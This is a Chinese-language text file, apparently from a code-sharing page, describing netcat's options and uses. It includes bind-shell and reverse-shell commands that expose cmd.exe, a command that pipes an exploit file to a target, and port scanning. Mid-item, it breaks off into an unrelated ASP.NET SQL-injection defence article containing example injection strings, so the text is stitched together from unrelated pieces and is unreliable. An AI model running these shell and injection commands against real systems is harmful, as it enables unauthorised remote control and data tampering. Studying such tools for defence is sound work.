?? nc的說明及使用.txt
字號:
nc的說明及使用
nc的說明及使用
nc的說明及使用
netcat被譽(yù)為網(wǎng)絡(luò)安全界的‘瑞士軍刀’,相信沒有什么人不認(rèn)識它吧......
一個簡單而有用的工具,透過使用TCP或UDP協(xié)議的網(wǎng)絡(luò)連接去讀寫數(shù)據(jù)。它被設(shè)計成一個穩(wěn)定的后門工具,
能夠直接由其它程序和腳本輕松驅(qū)動。同時,它也是一個功能強(qiáng)大的網(wǎng)絡(luò)調(diào)試和探測工具,能夠建立你需要的幾
乎所有類型的網(wǎng)絡(luò)連接,還有幾個很有意思的內(nèi)置功能(詳情請看下面的使用方法)。
在中國,它的WINDOWS版有兩個版本,一個是原創(chuàng)者Chris Wysopal寫的原版本,另一個是由‘紅與黑’編譯
后的新‘濃縮’版。‘濃縮’版的主程序只有10多KB(10多KB的NC是不能完成下面所說的第4、第5種使用方法,
有此功能的原版NC好象要60KB:P),雖然“體積”小,但很完成很多工作。
======================================================
軟件介紹:
工具名:Netcat
作者:Hobbit && Chris Wysopal
網(wǎng)址:http://www.atstake.com/research/tools/network_utilities/
類別:開放源碼
平臺:Linux/BSD/Unix/Windows
WINDOWS下版本號:[v1.10 NT]
=====================================================================================================
參數(shù)介紹:
nc.exe -h即可看到各參數(shù)的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后臺模式
-e prog 程序重定向,一旦連接,就執(zhí)行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監(jiān)聽模式,用于入站連接
-L 連接關(guān)閉后,仍然繼續(xù)監(jiān)聽
-n 指定數(shù)字的IP地址,不能用hostname
-o file 記錄16進(jìn)制的傳輸
-p port 本地端口號
-r 隨機(jī)本地及遠(yuǎn)程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細(xì)輸出--用兩個-v可得到更詳細(xì)的內(nèi)容
-w secs timeout的時間
-z 將輸入輸出關(guān)掉--用于掃描時
端口的表示方法可寫為M-N的范圍格式。
=====================================================================================================
基本用法:
大概有以下幾種用法:
1)連接到REMOTE主機(jī),例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口
2)監(jiān)聽LOCAL主機(jī),例子:
格式:nc -l -p 80
講解:監(jiān)聽本機(jī)的TCP80端口
3)掃描遠(yuǎn)程主機(jī),例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主機(jī)綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:綁定REMOTE主機(jī)的CMDSHELL在REMOTE主機(jī)的TCP5354端口
5)REMOTE主機(jī)綁定SHELL并反向連接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機(jī)的CMDSHELL并反向連接到192.168.x.x的TCP5354端口
以上為最基本的幾種用法(其實(shí)NC的用法還有很多,
當(dāng)配合管道命令“|”與重定向命令“<”、“>”等等命令功能更強(qiáng)大......)。
=====================================================================================================
高級用法:
6)作攻擊程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連接到192.168.x.x的80端口,并在其管道中發(fā)送c:exploit.txt的內(nèi)容(兩種格式確有相同的效果,
真是有異曲同工之妙:P)
附:c:exploit.txt為shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用-L(注意L是大寫)可以不停地監(jiān)聽某一個端口,直到ctrl+c為止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
講解:使用-L可以不停地監(jiān)聽某一個端口,直到ctrl+c為止,同時把結(jié)果輸出到c:log.txt中,如果把‘>’
改為‘>>’即可以追加日志
附:c:log.txt為日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p 80
講解:使用-L可以不停地監(jiān)聽某一個端口,直到ctrl+c為止,并把c:honeypot.txt的內(nèi)容‘送’入其
管道中
如果攻擊者知道應(yīng)用會將表單中輸入的內(nèi)容直接用于驗(yàn)證身份的查詢,他就會嘗試輸入某些特殊的SQL字符串篡改查詢改變其原來的功能,欺騙系統(tǒng)授予訪問權(quán)限。 系統(tǒng)環(huán)境不同,攻擊者可能造成的損害也不同,這主要由應(yīng)用訪問數(shù)據(jù)庫的安全權(quán)限決定。如果用戶的帳戶具有管理員或其他比較高級的權(quán)限,攻擊者就可能對數(shù)據(jù)庫的表執(zhí)行各種他想要做的操作,包括添加、刪除或更新數(shù)據(jù),甚至可能直接刪除表。 二、如何防范? 好在要防止ASP.NET應(yīng)用被SQL注入式攻擊闖入并不是一件特別困難的事情,只要在利用表單輸入的內(nèi)容構(gòu)造SQL命令之前,把所有輸入內(nèi)容過濾一番就可以了。過濾輸入內(nèi)容可以按多種方式進(jìn)行。 ⑴ 對于動態(tài)構(gòu)造SQL查詢的場合,可以使用下面的技術(shù): 第一:替換單引號,即把所有單獨(dú)出現(xiàn)的單引號改成兩個單引號,防止攻擊者修改SQL命令的含義。再來看前面的例子,“SELECT * from Users WHERE login = or 1=1 AND password = or 1=1”顯然會得到與“SELECT * from Users WHERE login = or 1=1 AND password = or 1=1”不同的結(jié)果。 第二:刪除用戶輸入內(nèi)容中的所有連字符,防止攻擊者構(gòu)造出類如“SELECT * from Users WHERE login = mas -- AND password =”之類的查詢,因?yàn)檫@類查詢的后半部分已經(jīng)被注釋掉,不再有效,攻擊者只要知道一個合法的用戶登錄名稱,根本不需要知道用戶的密碼就可以順利獲得訪問權(quán)限。 第三:對于用來執(zhí)行查詢的數(shù)據(jù)庫帳戶,限制其權(quán)限。用不同的用戶帳戶執(zhí)行查詢、插入、更新、刪除操作。由于隔離了不同帳戶可執(zhí)行的操作,因而也就防止了原本用于執(zhí)行SELECT命令的地方卻被用于執(zhí)行INSERT、UPDATE或DELETE命令。 ⑵ 用存儲過程來執(zhí)行所有的查詢。SQL參數(shù)的傳遞方式將防止攻擊者利用單引號和連字符實(shí)施攻擊。此外,它還使得數(shù)據(jù)庫權(quán)限可以限制到只允許特定的存儲過程執(zhí)行,所有的用戶輸入必須遵從被調(diào)用的存儲過程的安全上下文,這樣就很難再發(fā)生注入式攻擊了。 ⑶ 限制表單或查詢字符串輸入的長度。如果用戶的登錄名字最多只有10個字符,那么不要認(rèn)可表單中輸入的10個以上的字符,這將大大增加攻擊者在SQL命令中插入有害代碼的難度。 ⑷ 檢查用戶輸入的合法性,確信輸入的內(nèi)容只包含合法的數(shù)據(jù)。數(shù)據(jù)檢查應(yīng)當(dāng)在客戶端和服務(wù)器端都執(zhí)行——之所以要執(zhí)行服務(wù)器端驗(yàn)證,是為了彌補(bǔ)客戶端驗(yàn)證機(jī)制脆弱的安全性。 在客戶端,攻擊者完全有可能獲得網(wǎng)頁的源代碼,修改驗(yàn)證合法性的腳本(或者直接刪除腳本),然后將非法內(nèi)容通過修改后的表單提交給服務(wù)器。因此,要保證驗(yàn)證操作確實(shí)已經(jīng)執(zhí)行,唯一的辦法就是在服務(wù)器端也執(zhí)行驗(yàn)證。你可以使用許多內(nèi)建的驗(yàn)證對象,例如RegularExpressionValidator,它們能夠自動生成驗(yàn)證用的客戶端腳本,當(dāng)然你也可以插入服務(wù)器端的方法調(diào)用。如果找不到現(xiàn)成的驗(yàn)證對象,你可以通過CustomValidator自己創(chuàng)建一個。 ⑸ 將用戶登錄名稱、密碼等數(shù)據(jù)加密保存。加密用戶輸入的數(shù)據(jù),然后再將它與數(shù)據(jù)庫中保存的數(shù)據(jù)比較,這相當(dāng)于對用戶輸入的數(shù)據(jù)進(jìn)行了“消毒”處理,用戶輸入的數(shù)據(jù)不再對數(shù)據(jù)庫有任何特殊的意義,從而也就防止了攻擊者注入SQL命令。System.Web.Security.FormsAuthentication類有一個HashPasswordForStoringInConfigFile,非常適合于對輸入數(shù)據(jù)進(jìn)行消毒處理。 ⑹ 檢查提取數(shù)據(jù)的查詢所返回的記錄數(shù)量。如果程序只要求返回一個記錄,但實(shí)際返回的記錄卻超過一行,那就當(dāng)作出錯處理。
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -